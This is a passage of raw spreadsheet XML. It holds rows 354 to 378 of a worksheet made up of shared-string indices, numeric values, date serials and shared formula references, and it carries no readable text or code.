      <c r="P354" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q354" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R354" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S354" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="1">
        <v>5108.0</v>
      </c>
      <c r="B355" s="2" t="s">
        <v>1762</v>
      </c>
      <c r="C355" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D355" s="2" t="s">
        <v>1763</v>
      </c>
      <c r="E355" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F355" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G355" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H355" s="4">
        <v>44353.69305555556</v>
      </c>
      <c r="I355" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J355" s="1" t="s">
        <v>1764</v>
      </c>
      <c r="K355" s="2" t="s">
        <v>1765</v>
      </c>
      <c r="L355" s="1">
        <v>1.0</v>
      </c>
      <c r="M355" s="1">
        <v>1.0</v>
      </c>
      <c r="N355" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O355" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P355" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="Q355" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R355" s="2">
        <f t="shared" si="2"/>
        <v>20</v>
      </c>
      <c r="S355" s="1">
        <f t="shared" si="3"/>
        <v>20</v>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="1">
        <v>5109.0</v>
      </c>
      <c r="B356" s="2" t="s">
        <v>1767</v>
      </c>
      <c r="C356" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D356" s="2" t="s">
        <v>1768</v>
      </c>
      <c r="E356" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F356" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="G356" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H356" s="4">
        <v>43896.85555555556</v>
      </c>
      <c r="I356" s="1" t="s">
        <v>408</v>
      </c>
      <c r="J356" s="1" t="s">
        <v>1770</v>
      </c>
      <c r="K356" s="2" t="s">
        <v>1771</v>
      </c>
      <c r="L356" s="1">
        <v>5.0</v>
      </c>
      <c r="M356" s="1">
        <v>5.0</v>
      </c>
      <c r="N356" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O356" s="1" t="s">
        <v>1772</v>
      </c>
      <c r="P356" s="1" t="s">
        <v>573</v>
      </c>
      <c r="Q356" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R356" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S356" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="1">
        <v>5110.0</v>
      </c>
      <c r="B357" s="2" t="s">
        <v>1773</v>
      </c>
      <c r="C357" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D357" s="2" t="s">
        <v>1774</v>
      </c>
      <c r="E357" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F357" s="1" t="s">
        <v>1775</v>
      </c>
      <c r="G357" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H357" s="4">
        <v>43896.888194444444</v>
      </c>
      <c r="I357" s="1" t="s">
        <v>408</v>
      </c>
      <c r="J357" s="1" t="s">
        <v>1770</v>
      </c>
      <c r="K357" s="2" t="s">
        <v>1771</v>
      </c>
      <c r="L357" s="1">
        <v>5.0</v>
      </c>
      <c r="M357" s="1">
        <v>5.0</v>
      </c>
      <c r="N357" s="1" t="s">
        <v>1776</v>
      </c>
      <c r="O357" s="1" t="s">
        <v>1772</v>
      </c>
      <c r="P357" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q357" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R357" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S357" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="1">
        <v>5111.0</v>
      </c>
      <c r="B358" s="2" t="s">
        <v>1777</v>
      </c>
      <c r="C358" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D358" s="2" t="s">
        <v>1778</v>
      </c>
      <c r="E358" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F358" s="1" t="s">
        <v>1779</v>
      </c>
      <c r="G358" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H358" s="4">
        <v>43896.89791666667</v>
      </c>
      <c r="I358" s="1" t="s">
        <v>408</v>
      </c>
      <c r="J358" s="1" t="s">
        <v>1770</v>
      </c>
      <c r="K358" s="2" t="s">
        <v>1771</v>
      </c>
      <c r="L358" s="1">
        <v>5.0</v>
      </c>
      <c r="M358" s="1">
        <v>5.0</v>
      </c>
      <c r="N358" s="1" t="s">
        <v>214</v>
      </c>
      <c r="O358" s="1" t="s">
        <v>1772</v>
      </c>
      <c r="P358" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q358" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R358" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S358" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="1">
        <v>5112.0</v>
      </c>
      <c r="B359" s="2" t="s">
        <v>1780</v>
      </c>
      <c r="C359" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D359" s="2" t="s">
        <v>1778</v>
      </c>
      <c r="E359" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F359" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G359" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H359" s="4">
        <v>43896.978472222225</v>
      </c>
      <c r="I359" s="1" t="s">
        <v>408</v>
      </c>
      <c r="J359" s="1" t="s">
        <v>1770</v>
      </c>
      <c r="K359" s="2" t="s">
        <v>1771</v>
      </c>
      <c r="L359" s="1">
        <v>5.0</v>
      </c>
      <c r="M359" s="1">
        <v>5.0</v>
      </c>
      <c r="N359" s="1" t="s">
        <v>1030</v>
      </c>
      <c r="O359" s="1" t="s">
        <v>1772</v>
      </c>
      <c r="P359" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q359" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R359" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S359" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="1">
        <v>5113.0</v>
      </c>
      <c r="B360" s="2" t="s">
        <v>1781</v>
      </c>
      <c r="C360" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D360" s="2" t="s">
        <v>1774</v>
      </c>
      <c r="E360" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F360" s="1" t="s">
        <v>1782</v>
      </c>
      <c r="G360" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H360" s="4">
        <v>44172.152083333334</v>
      </c>
      <c r="I360" s="1" t="s">
        <v>408</v>
      </c>
      <c r="J360" s="1" t="s">
        <v>1770</v>
      </c>
      <c r="K360" s="2" t="s">
        <v>1771</v>
      </c>
      <c r="L360" s="1">
        <v>5.0</v>
      </c>
      <c r="M360" s="1">
        <v>5.0</v>
      </c>
      <c r="N360" s="1" t="s">
        <v>1783</v>
      </c>
      <c r="O360" s="1" t="s">
        <v>1772</v>
      </c>
      <c r="P360" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q360" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R360" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S360" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="1">
        <v>5114.0</v>
      </c>
      <c r="B361" s="2" t="s">
        <v>1784</v>
      </c>
      <c r="C361" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D361" s="2" t="s">
        <v>1785</v>
      </c>
      <c r="E361" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F361" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G361" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H361" s="4">
        <v>44654.01944444444</v>
      </c>
      <c r="I361" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J361" s="1" t="s">
        <v>1786</v>
      </c>
      <c r="K361" s="2" t="s">
        <v>1787</v>
      </c>
      <c r="L361" s="1">
        <v>3.0</v>
      </c>
      <c r="M361" s="1">
        <v>3.0</v>
      </c>
      <c r="N361" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O361" s="1" t="s">
        <v>1788</v>
      </c>
      <c r="P361" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q361" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R361" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S361" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="1">
        <v>5115.0</v>
      </c>
      <c r="B362" s="2" t="s">
        <v>1789</v>
      </c>
      <c r="C362" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D362" s="2" t="s">
        <v>1790</v>
      </c>
      <c r="E362" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F362" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="G362" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H362" s="4">
        <v>44654.618055555555</v>
      </c>
      <c r="I362" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J362" s="1" t="s">
        <v>1786</v>
      </c>
      <c r="K362" s="2" t="s">
        <v>1787</v>
      </c>
      <c r="L362" s="1">
        <v>3.0</v>
      </c>
      <c r="M362" s="1">
        <v>3.0</v>
      </c>
      <c r="N362" s="1" t="s">
        <v>1791</v>
      </c>
      <c r="O362" s="1" t="s">
        <v>1788</v>
      </c>
      <c r="P362" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q362" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R362" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S362" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="1">
        <v>5125.0</v>
      </c>
      <c r="B363" s="2" t="s">
        <v>1792</v>
      </c>
      <c r="C363" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D363" s="2" t="s">
        <v>1793</v>
      </c>
      <c r="E363" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F363" s="1" t="s">
        <v>1794</v>
      </c>
      <c r="G363" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H363" s="1" t="s">
        <v>1795</v>
      </c>
      <c r="I363" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J363" s="1" t="s">
        <v>1796</v>
      </c>
      <c r="K363" s="2" t="s">
        <v>1797</v>
      </c>
      <c r="L363" s="1">
        <v>7.0</v>
      </c>
      <c r="M363" s="1">
        <v>11.0</v>
      </c>
      <c r="N363" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O363" s="1" t="s">
        <v>1798</v>
      </c>
      <c r="P363" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q363" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R363" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S363" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="1">
        <v>5127.0</v>
      </c>
      <c r="B364" s="2" t="s">
        <v>1799</v>
      </c>
      <c r="C364" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D364" s="2" t="s">
        <v>1800</v>
      </c>
      <c r="E364" s="2" t="s">
        <v>1608</v>
      </c>
      <c r="F364" s="1" t="s">
        <v>1801</v>
      </c>
      <c r="G364" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H364" s="1" t="s">
        <v>1802</v>
      </c>
      <c r="I364" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J364" s="1" t="s">
        <v>1796</v>
      </c>
      <c r="K364" s="2" t="s">
        <v>1797</v>
      </c>
      <c r="L364" s="1">
        <v>7.0</v>
      </c>
      <c r="M364" s="1">
        <v>11.0</v>
      </c>
      <c r="N364" s="1" t="s">
        <v>1803</v>
      </c>
      <c r="O364" s="1" t="s">
        <v>1798</v>
      </c>
      <c r="P364" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q364" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R364" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S364" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="1">
        <v>5191.0</v>
      </c>
      <c r="B365" s="2" t="s">
        <v>1804</v>
      </c>
      <c r="C365" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D365" s="2" t="s">
        <v>1805</v>
      </c>
      <c r="E365" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F365" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G365" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H365" s="4">
        <v>44655.11319444444</v>
      </c>
      <c r="I365" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J365" s="1" t="s">
        <v>1806</v>
      </c>
      <c r="K365" s="2" t="s">
        <v>1807</v>
      </c>
      <c r="L365" s="1">
        <v>2.0</v>
      </c>
      <c r="M365" s="1">
        <v>3.0</v>
      </c>
      <c r="N365" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O365" s="1" t="s">
        <v>1808</v>
      </c>
      <c r="P365" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q365" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R365" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S365" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="1">
        <v>5193.0</v>
      </c>
      <c r="B366" s="2" t="s">
        <v>1809</v>
      </c>
      <c r="C366" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D366" s="2" t="s">
        <v>1810</v>
      </c>
      <c r="E366" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F366" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G366" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H366" s="4">
        <v>44655.861805555556</v>
      </c>
      <c r="I366" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J366" s="1" t="s">
        <v>1806</v>
      </c>
      <c r="K366" s="2" t="s">
        <v>1807</v>
      </c>
      <c r="L366" s="1">
        <v>2.0</v>
      </c>
      <c r="M366" s="1">
        <v>3.0</v>
      </c>
      <c r="N366" s="1" t="s">
        <v>1811</v>
      </c>
      <c r="O366" s="1" t="s">
        <v>1808</v>
      </c>
      <c r="P366" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q366" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R366" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S366" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="1">
        <v>5203.0</v>
      </c>
      <c r="B367" s="2" t="s">
        <v>1812</v>
      </c>
      <c r="C367" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D367" s="2" t="s">
        <v>1813</v>
      </c>
      <c r="E367" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F367" s="1" t="s">
        <v>1814</v>
      </c>
      <c r="G367" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H367" s="1" t="s">
        <v>1815</v>
      </c>
      <c r="I367" s="1" t="s">
        <v>461</v>
      </c>
      <c r="J367" s="1" t="s">
        <v>1816</v>
      </c>
      <c r="K367" s="2" t="s">
        <v>1817</v>
      </c>
      <c r="L367" s="1">
        <v>9.0</v>
      </c>
      <c r="M367" s="1">
        <v>10.0</v>
      </c>
      <c r="N367" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O367" s="1" t="s">
        <v>1818</v>
      </c>
      <c r="P367" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q367" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R367" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S367" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="1">
        <v>5258.0</v>
      </c>
      <c r="B368" s="2" t="s">
        <v>1819</v>
      </c>
      <c r="C368" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D368" s="2" t="s">
        <v>1820</v>
      </c>
      <c r="E368" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F368" s="1" t="s">
        <v>1821</v>
      </c>
      <c r="G368" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H368" s="1" t="s">
        <v>1822</v>
      </c>
      <c r="I368" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="J368" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="K368" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="L368" s="1">
        <v>77.0</v>
      </c>
      <c r="M368" s="1">
        <v>202.0</v>
      </c>
      <c r="N368" s="1" t="s">
        <v>1826</v>
      </c>
      <c r="O368" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="P368" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q368" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R368" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S368" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="1">
        <v>5259.0</v>
      </c>
      <c r="B369" s="2" t="s">
        <v>1828</v>
      </c>
      <c r="C369" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D369" s="2" t="s">
        <v>1829</v>
      </c>
      <c r="E369" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F369" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G369" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H369" s="1" t="s">
        <v>1830</v>
      </c>
      <c r="I369" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="J369" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="K369" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="L369" s="1">
        <v>77.0</v>
      </c>
      <c r="M369" s="1">
        <v>202.0</v>
      </c>
      <c r="N369" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="O369" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="P369" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q369" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R369" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S369" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="1">
        <v>5267.0</v>
      </c>
      <c r="B370" s="2" t="s">
        <v>1832</v>
      </c>
      <c r="C370" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D370" s="6" t="s">
        <v>1820</v>
      </c>
      <c r="E370" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F370" s="1" t="s">
        <v>1833</v>
      </c>
      <c r="G370" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H370" s="1" t="s">
        <v>1834</v>
      </c>
      <c r="I370" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="J370" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="K370" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="L370" s="1">
        <v>77.0</v>
      </c>
      <c r="M370" s="1">
        <v>202.0</v>
      </c>
      <c r="N370" s="1" t="s">
        <v>1835</v>
      </c>
      <c r="O370" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="P370" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q370" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R370" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S370" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="1">
        <v>5268.0</v>
      </c>
      <c r="B371" s="2" t="s">
        <v>1836</v>
      </c>
      <c r="C371" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D371" s="2" t="s">
        <v>1829</v>
      </c>
      <c r="E371" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F371" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G371" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H371" s="1" t="s">
        <v>1837</v>
      </c>
      <c r="I371" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="J371" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="K371" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="L371" s="1">
        <v>77.0</v>
      </c>
      <c r="M371" s="1">
        <v>202.0</v>
      </c>
      <c r="N371" s="1" t="s">
        <v>1838</v>
      </c>
      <c r="O371" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="P371" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q371" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R371" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S371" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="1">
        <v>5272.0</v>
      </c>
      <c r="B372" s="2" t="s">
        <v>1839</v>
      </c>
      <c r="C372" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D372" s="6" t="s">
        <v>1820</v>
      </c>
      <c r="E372" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F372" s="1" t="s">
        <v>1840</v>
      </c>
      <c r="G372" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H372" s="4">
        <v>44256.058333333334</v>
      </c>
      <c r="I372" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="J372" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="K372" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="L372" s="1">
        <v>77.0</v>
      </c>
      <c r="M372" s="1">
        <v>202.0</v>
      </c>
      <c r="N372" s="1" t="s">
        <v>1841</v>
      </c>
      <c r="O372" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="P372" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q372" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R372" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S372" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="1">
        <v>5292.0</v>
      </c>
      <c r="B373" s="2" t="s">
        <v>1842</v>
      </c>
      <c r="C373" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D373" s="2" t="s">
        <v>1829</v>
      </c>
      <c r="E373" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F373" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G373" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H373" s="1" t="s">
        <v>1843</v>
      </c>
      <c r="I373" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="J373" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="K373" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="L373" s="1">
        <v>77.0</v>
      </c>
      <c r="M373" s="1">
        <v>202.0</v>
      </c>
      <c r="N373" s="1" t="s">
        <v>1844</v>
      </c>
      <c r="O373" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="P373" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q373" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R373" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S373" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="1">
        <v>5296.0</v>
      </c>
      <c r="B374" s="2" t="s">
        <v>1845</v>
      </c>
      <c r="C374" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D374" s="2" t="s">
        <v>1846</v>
      </c>
      <c r="E374" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F374" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="G374" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H374" s="1" t="s">
        <v>1847</v>
      </c>
      <c r="I374" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="J374" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="K374" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="L374" s="1">
        <v>77.0</v>
      </c>
      <c r="M374" s="1">
        <v>202.0</v>
      </c>
      <c r="N374" s="1" t="s">
        <v>1848</v>
      </c>
      <c r="O374" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="P374" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q374" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R374" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S374" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="1">
        <v>5297.0</v>
      </c>
      <c r="B375" s="2" t="s">
        <v>1849</v>
      </c>
      <c r="C375" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D375" s="2" t="s">
        <v>1850</v>
      </c>
      <c r="E375" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F375" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G375" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H375" s="1" t="s">
        <v>1851</v>
      </c>
      <c r="I375" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="J375" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="K375" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="L375" s="1">
        <v>77.0</v>
      </c>
      <c r="M375" s="1">
        <v>202.0</v>
      </c>
      <c r="N375" s="1" t="s">
        <v>1852</v>
      </c>
      <c r="O375" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="P375" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q375" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R375" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S375" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="1">
        <v>5439.0</v>
      </c>
      <c r="B376" s="2" t="s">
        <v>1853</v>
      </c>
      <c r="C376" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D376" s="2" t="s">
        <v>1854</v>
      </c>
      <c r="E376" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F376" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G376" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H376" s="1" t="s">
        <v>1855</v>
      </c>
      <c r="I376" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J376" s="1" t="s">
        <v>1856</v>
      </c>
      <c r="K376" s="2" t="s">
        <v>1857</v>
      </c>
      <c r="L376" s="1">
        <v>2.0</v>
      </c>
      <c r="M376" s="1">
        <v>2.0</v>
      </c>
      <c r="N376" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O376" s="1" t="s">
        <v>1858</v>
      </c>
      <c r="P376" s="1" t="s">
        <v>1859</v>
      </c>
      <c r="Q376" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R376" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S376" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="1">
        <v>5441.0</v>
      </c>
      <c r="B377" s="2" t="s">
        <v>1860</v>
      </c>
      <c r="C377" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D377" s="2" t="s">
        <v>1861</v>
      </c>
      <c r="E377" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F377" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G377" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H377" s="1" t="s">
        <v>1862</v>
      </c>
      <c r="I377" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J377" s="1" t="s">
        <v>1863</v>
      </c>
      <c r="K377" s="2" t="s">
        <v>1864</v>
      </c>
      <c r="L377" s="1">
        <v>1.0</v>
      </c>
      <c r="M377" s="1">
        <v>1.0</v>
      </c>
      <c r="N377" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O377" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P377" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q377" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R377" s="2">
        <f t="shared" si="2"/>
        <v>9</v>
      </c>
      <c r="S377" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="1">
        <v>5442.0</v>
      </c>
      <c r="B378" s="2" t="s">
        <v>1866</v>
      </c>
      <c r="C378" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D378" s="2" t="s">
        <v>1867</v>
      </c>
